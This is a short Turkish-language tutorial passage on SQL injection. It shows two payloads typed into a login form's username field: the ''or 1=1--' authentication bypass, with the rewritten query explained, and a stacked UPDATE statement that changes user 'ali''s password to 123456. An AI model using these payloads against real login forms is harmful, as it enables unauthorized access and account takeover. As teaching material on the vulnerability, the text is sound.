04:52

SQL Injection

2 tane komut vardır.
'or 1=1--
'or 1=1-- ifadesinin TextBox'a girilmesi sonucu sorgu ifadesi şu şekle dönüşmüş olur.

Select * From users Where username = ' 'or 1=1--' AND password = '"+ txtpassword.Text +"'

Kullanıcı adını yazdığımız TextBox nesnesine girilen 'or 1=1-- ifadesinde yer alan -- işaretlerinin anlamı; -- işaretlerinden gelen sonraki ifadeleri yoksay olacaktır. Yani sonuç olarak ifademiz;

Select * From users Where username = ' 'or 1=1--

şekline dönüşecektir.Bu ifadede yer alan or 1=1 ifadesi sürekli doğru sonucu vereceğinden sonuç olarak sorgu işlemi bir kayıt döndürecektir.

diğeri: kullanıcı adına yazınca

';UPDATE users SET password = '123456' WHERE username = 'ali' --
Bu ifade ile users tablosunda yer alan kullanıcı adı ali olan kişinin şifresini 123456 olarak değiştiriyor.